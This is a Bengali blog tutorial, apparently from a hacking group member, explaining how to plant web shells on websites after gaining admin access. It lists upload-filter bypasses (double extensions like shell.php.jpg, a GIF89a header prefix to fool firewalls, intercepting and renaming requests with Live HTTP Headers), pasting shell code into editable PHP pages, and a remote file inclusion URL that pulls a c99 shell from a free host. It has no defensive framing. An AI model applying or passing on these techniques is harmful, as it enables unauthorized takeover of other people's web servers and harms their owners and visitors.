ওয়েবসাইট এ কিভাবে শেল আপলোড করবেন …/….

5
454

প্রথম এ বলে নেই এটি একটি NFN (Not For Noobs) টিউটোরিয়াল । এটি বুঝতে হলে বেসিক হ্যাকিং জানা অত্যাবশ্যক । আমরা অনেক সময় ওয়েবসাইট এর অ্যাডমিন প্যানেল এ প্রবেশ করি এবং পি এইচ পি, এ এস পি , এ এস পি এক্স  ইত্যাদি  শেল আপলোড এর চেস্টা করি । কিন্তু দেখা যায় বিভিন্ন সমস্যা হয় । শেল আপলোড হয়না … এন্টিভাইরাস ব্লক দেয় ইত্যাদি । অ্যাডমিন প্যানেল এ লগিন করার পর সহজেই আপলোড বাটন এর সাহায্যে শেল আপলোড দেয়া যায় । কিন্তু মাঝে মাঝে কিছু সমস্যা হতে পারে । তাই সহজ উপায় এ শেল আপলোড না হলে কিভাভে তাকে কাস্টোমাইজ করে আপলোড করা যায় তাই আপনাদেরকে বলব ।

ওয়েবসাইট এ কিভাবে শেল আপলোড করবেন …/….

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

প্রথম পদ্ধতি

আমরা জানি বেশিরভাগ শেল থাকে .php বাঃ .asp ফরমেটে । অনেক সময় অনেক ওয়েবসাইট সে ফরমেট গুলো সাপোর্ট করে না । এর সবথেকে সহজ সমাধান হল সেগুলকে রিনেম করা । মানে নামের শেষ এ .php এর পরে .jpg , .png , .doc এসব বসিয়ে দেয়া । তাতে অনেক সময় কাজ হয়ে যায় ।

দ্বিতীয় পদ্ধতি
দ্বিতীয় পদ্ধতি হল শেল আপ্লোডার আপলোড করে শেল আপলোড করুন । এমন শেল আপ্লোডার আপলোড করুন যেটি এন্টিভাইরাস বাঃ ফায়ার ওয়াল দ্বারা সনাক্ত হবে না । এরকম আপ্লোডার আপনি নেটে খুজলেই পাবেন

তৃতীয় পদ্ধতি

কিছু ফায়াওয়াল যেমন comodo firewall , encripted security শেল এর হেডার চেক করে ও সেই শেল কে ব্লক করে দেয় । তাই এ থেকে বাচার উপায় হচ্ছে notepad এ এডিট করতে শেল টি খুলুন আমরা একে GIF89A SHELL SCRIPT দ্বারা এডিট করব । এর জন্য শেল এর স্ক্রিপ্ট শুরু হবার আগে GIF89a; অ্যাড করে দিন । এরপর সেভ করে নিন ।

চতুর্থ পদ্ধতি

আপনার ফায়ার ফক্স ব্রাউযার এ LIVE HTTP HEADERS অ্যাড ওয়ান টি ইন্সটাল করে নিন ।
> এখন আপনার পি এইচ পি শেল এর নামের শেষ এ .jpg বাঃ .png অ্যাড করে নিন । মানে সেই সাইট এ যে ফাইল ফরমেট সাপোর্ট করে আরকি ।
> এখন সেই সাইটে শেল শেল আপলোড করে আপনার অ্যাড অন টি খুলুন । সেই পেজেই
> তাহলে আপনার live http header নিচের ছবির মত দেখাবে ।
ওয়েবসাইট এ কিভাবে শেল আপলোড করবেন …/….
> এরপর রিপ্লাই বাটন এ ক্লিক করার পর shell.php.jpg তে ক্লিক করুন ।
> তাহলে দেখবেন নতুন উইন্ডো ওপেন হবে । সেখানে দুটি বক্স থাকবে । আমাদের কাজ ২ নাম্বার টিকে নিয়ে ।
> এরপর দুই নাম্বার বক্স এ .jpg তুলে দিয়ে shell. php নামে রিনেম করুন ।
দেখুন আমরা সার্ভার কে প্রথমে দেখালাম আমরা ছবি আপলোড করছি । সে তাই মেনে নিল । এরপর এই অ্যাড অন কে দিয়ে আমরা সেই পেজ এডিট করে আমাদের শেল ইঞ্জেক্ট করে দিলাম ।
ওয়েবসাইট এ কিভাবে শেল আপলোড করবেন …/….

পঞ্চম পদ্ধতি
উপরের চার টি পদ্ধতি কাজ করবে যখন আপনি আপলোড বাটন পাবেন । না পেলে ……… আপনাকে খুজতে হবে এডিট ইমেজ বাঃ এডিট আর্টিকেল নামে কিছু আছে কিনা । আপনাকে এটিও খেয়াল রাখতে হবে যে url এর শেষ এ .php ..asp এসব আছে কিনা । থাকলে সেই এডিট বাটনে ক্লিক করে সেখানে থাকা সবকিছু মুছে ফেলতে হবে । এরপর আপনার
শেল  কে নোটপ্যাড এ খুলে সেখান থেকে সব কোড কপি করে পেস্ট করে দিতে হবে । কিন্তু অবশ্যই খেয়াল রাখবেন যে সেই পেযে যেন php কোড এডিট করার অপসন থাকে । সেটা না হলে আপনার শেল এর স্ক্রিপ্ট কাজ করবে না ।
ষষ্ঠ পদ্ধতি

RFI Vulnerable সাইটে সাধারনত অন্যান্য ফ্রী হোস্টিং সাইটের মাদ্ধমে শেল আপলোড করতে হয় । এর জন্য
> আপনার শেল কে যে কোনও ফ্রী হোস্টিং সাইট যেমন http://www.110mb.com, http://www.my3gb.com ইত্যাদি সাইট এ আপলোড করুন ।
> ধরুন আপনার লিঙ্ক হল http://www.example.110mb.com/c99.txt এবং আপনার vulnerable সাইট এর লিঙ্ক হল http://www.abc.com . তাহলে শেল কে সাইট এ বসাতে কম্যান্ড টি হবে ।
http://www.abc .com/v2/index.php?page=http://www.example.110mb.com/c99.txt
> আপনি আপনার শেল ও সাইট এর নাম এখানে বসাবেন । এটি উদাহরন দেয়া হল । কিন্তু সাইট RFI VULNERABLE না হলে এটি কাজ করবে না

শেষ কথা

আর অনেক পদ্ধতি আছে । আমি সেগুল আয়ত্তে আনতে পারলে শেয়ার করব । আজকে তো এগুলো বললাম পরের লেখায় joomla, wordpress, vbulletine এসব সাইট এ কিভাবে শেল আপলোড করতে হয় টা তুলে ধরব । আর বাংলাদেশ সাইবার আর্মি এর যে কোনও পর্যায় এর সদস্য বাদে অন্য কেউ লেখকের অনুমতি ছাড়া এটি কপি পেস্ট করবেন না ।

এরকম অনেক কিছু পাবেন > http://www.facebppk.com/CY133R
আর আমি আছি > http://www.facebook.com/II.45LAN.II
আল্লাহ হাফেয

টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

5 মন্তব্য

একটি উত্তর ত্যাগ

Please enter your comment!
Please enter your name here

9 + 9 =